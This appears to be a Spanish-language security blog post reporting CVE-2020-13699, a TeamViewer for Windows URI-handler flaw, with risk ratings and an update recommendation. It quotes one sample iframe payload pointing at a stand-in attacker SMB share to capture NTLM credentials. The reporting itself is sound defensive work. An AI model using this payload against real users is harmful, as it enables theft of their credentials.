Falla en Teamviewer podría ser explotada para descifrar las contraseñas de los usuarios

TeamViewer es una aplicación desarrollada por la compañía TeamViewer GmbH, utilizada principalmente para acceder y controlar de forma remota a una variedad de sistemas, como computadores o dispositivos móviles, aunque también posee otras características de colaboración y presentación, como compartir escritorio, realizar conferencias en línea, transferir archivos, entre otros. Está disponible para los sistemas Windows, macOS, Linux, Chrome OS, iOS, Android, Windows Phone 8 y Blackberry OS. Cabe destacar que su uso ha incrementado en gran medida por parte de las empresas, debido a  la cantidad de empleados que se han visto forzadas a trabajar desde sus hogares por la situación mundial.

Recientemente se ha descubierto una vulnerabilidad (CVE-2020-13699) en TeamViewer que afecta a su versión para los sistemas Windows, la cual al ser explotada puede permitir a un atacante remoto descifrar las contraseñas de los usuarios y, consecuentemente, escalar a una mayor explotación del sistema.

La vulnerabilidad (CVE-2020-13699) en resumen, se debe a una debilidad, carencia o falta de controles, al permitir una búsqueda de un elemento o ruta no solicitada, específicamente, cita incorrectamente a los controladores de las URI personalizadas, esto significa que puede explotarse, cuando un sistema con una instalación de TeamViewer vulnerable visita un sitio web especialmente diseñado para ello.

Según el experto que descubrió la vulnerabilidad, un atacante podría insertar un iframe malicioso en un sitio web con una URL especialmente diseñada (iframe src=’teamviewer10: --play \\attacker-IP\share\fake.tvs') causando que el cliente de escritorio de Windows de Teamviewer se inicie y forzándolo a abrir un recurso compartido remoto SMB, el cual al abrirse, Windows realizará la autenticación NTLM (NT Lan Manager) y esa solicitud podría ser retransmitida o capturada (utilizando alguna herramienta), con la finalidad de ejecutar código.

Por suerte, aún no se ha registrado ningún exploit que se aproveche de esta vulnerabilidad y no hay indicios que esta vulnerabilidad fuera explotada anteriormente. Según el CIS, el riesgo de explotación es alto para instituciones gubernamentales y compañías de tamaño medio o mas, para el caso de las entidades pequeñas de las nombradas su riesgo es medio y para los usuarios de hogar el riesgo es bajo.

La vulnerabilidad afecta desde la versión 8 hasta la 15.8.2 de TeamViewer para las plataformas Windows. Se recomienda encarecidamente a los usuarios actualizar a la versión 15.8.3 para mitigarla.



Fuente:

COMENTARIOS

Nombre

Actualización,3,Actualizaciones,4,Adobe,2,Adware,3,AgentTesla,1,android,31,Antivirus,3,Apache,1,APP,1,Apple,16,Apps,13,APT,1,Arkavia Networks,15,asus,1,Ataques,7,Azure,2,Backdoor,5,Bancos,6,Barracuda,1,Bases de Datos,6,BCE,1,Bluetooth,1,bootHole,1,Botnet,6,Botnet. Malware,1,Check Point,3,Chips,1,Chrome,3,Ciberataque,4,Cibercrimen,135,Ciberdelincuencia,9,ciberseguridad,141,Cisco,3,Citrix,5,Cloud,2,CMS,1,ComRAT,1,Comunicaciones,1,Consejos,1,CONVID,1,CookieThief,1,Coronavirus,1,COVID19,2,CPU,3,Criptomonedas,7,CSP,1,CTF,1,cyber day,2,Cyberwarfare,5,Dark Web,2,Data Breach,3,Data Leak,11,Database,2,Datos,2,DDoS,4,Deep Web,5,dlink,1,DNS,1,Domains,1,DoS,1,Ecommerce,3,elasticsearch,1,Email,2,Emotet,2,Empresas,113,enrutadores,1,Estadisticas,1,evento,1,Eventos,6,Evilnum,1,Exchange,2,exploit,7,Exploits,11,Extensiones,2,Extensions,2,F5 Networks,1,Facebook,9,Falla,1,Fintech,1,Firewall,1,Firmware,2,Flash,1,Framework,1,Freta,1,GARMIN,2,Glueball,1,Gmail,3,GoDaddy,1,google,34,GPS,2,GRUB2,1,Hacking,83,Hardware,7,Hosting,3,HTML5,1,HTTP,1,IBM,1,IGMP,1,Industria,10,Infostealer,2,Instagram,2,Intel,2,Internacional,40,Internet,34,Investigacion,9,IOC,1,ios,5,IoT,4,ipad,1,iphone,1,ISO,1,Joomla,1,LG,1,Linux,9,LSASS,1,Macromedia,1,Malware,45,Malwares,32,Maze,1,Messenger,1,MFA,1,Microsoft,37,Mirai,2,Monero,1,mongoDB,1,MSP,1,MSSQL,1,Mukashi,1,Nacional,10,NAS,2,Negocios,2,Netgear,1,Node.js,1,Openwrt,1,Oracle,2,OS,9,Passwordless,1,Payload,2,Paypal,1,phishing,16,Plugins,1,PoC,2,Protocolos,12,Python,2,QNAP,1,QR,1,Ragnar_Locker,1,Ransomware,18,RAT,2,RCE,2,RDP,3,Recomendaciones,16,Redes,30,redes sociales,12,Redhat,1,Remoto,1,Rookit,1,Rootkit,1,Routers,3,RRSS,2,Salt,1,Salud,2,SeguridadTI,1,Servicios,6,Smartphones,29,SMB,5,Software,23,Sophos,1,Spambot,1,Spamhaus,1,Spyware,11,SQL,1,SSL,1,Teams,1,TeamViewer,1,Tplink,1,Trickbot,1,Trojan,2,Troyano,3,Update,5,updates,22,USB,1,Videoconferencia,1,VNC,1,VPN,3,Vulnerabilidad,34,Vulnerabilidades,76,Web,8,WhatsApp,5,wifi,5,Windows,19,Wordpress,4,Xerox,1,XG,1,Yahoo,1,zeroday,3,Zoom,3,Zoombombing,1,
ltr
item
Arkavia Networks News: Falla en Teamviewer podría ser explotada para descifrar las contraseñas de los usuarios
Falla en Teamviewer podría ser explotada para descifrar las contraseñas de los usuarios
https://1.bp.blogspot.com/-02gcuoiptjE/Xywssut2cOI/AAAAAAAACPM/u4b1pQWbe2EOHOXaed0mVtd4Zfnh2nJWwCLcBGAsYHQ/s0/TeamViewer%2BVulnerability.jpg
https://1.bp.blogspot.com/-02gcuoiptjE/Xywssut2cOI/AAAAAAAACPM/u4b1pQWbe2EOHOXaed0mVtd4Zfnh2nJWwCLcBGAsYHQ/s72-c/TeamViewer%2BVulnerability.jpg
Arkavia Networks News
https://www.arkalabs.cl/2020/08/falla-en-teamviewer-podria-ser.html
https://www.arkalabs.cl/
https://www.arkalabs.cl/
https://www.arkalabs.cl/2020/08/falla-en-teamviewer-podria-ser.html
true
7213111567211435179
UTF-8
Se han cargado todas las publicaciones No se ha encontrado ninguna publicación. Ver Todos Leer Noticia Responder Cancelar Respuesta Eliminar Por Inicio PÁGINAS ENTRADAS View All RECOMENDADO PARA TI ETIQUETA ARCHIVOS BUSQUEDA TODAS LAS ENTRADAS No se ha encontrado ninguna coincidencia de publicación con su solicitud. Volver al Inicio Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share. STEP 2: Click the link you shared to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy